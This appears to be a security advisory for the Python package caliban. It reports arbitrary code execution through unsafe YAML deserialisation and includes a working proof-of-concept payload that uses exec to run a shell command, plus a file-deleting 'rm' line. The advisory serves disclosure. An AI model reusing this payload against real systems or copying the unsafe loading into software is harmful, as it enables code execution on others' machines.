caliban

vulnerability arbitrary code execution
severity 3.8
language python
registry pypi

Description

Caliban is a tool that helps researchers launch and track their numerical experiments in an isolated, reproducible computing environment. It was developed by machine learning researchers and engineers, and makes it easy to go from a simple prototype running on a workstation to thousands of experimental jobs running on Cloud.

  • Vulnerability discription Vulnerable to yaml deserilisation attack caused by unsafe loading.

Proof of Concept

job_spec = yaml.load(f, Loader=yaml.FullLoader)
# exploit.py
import os
os.system('pip install caliban')
import caliban.platform.gke.util as ut
exploit = '''!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
'''
os.system('rm exploit.*')
open('exploit.yaml','w+').write(exploit)
ut.parse_job_file('exploit.yaml')

References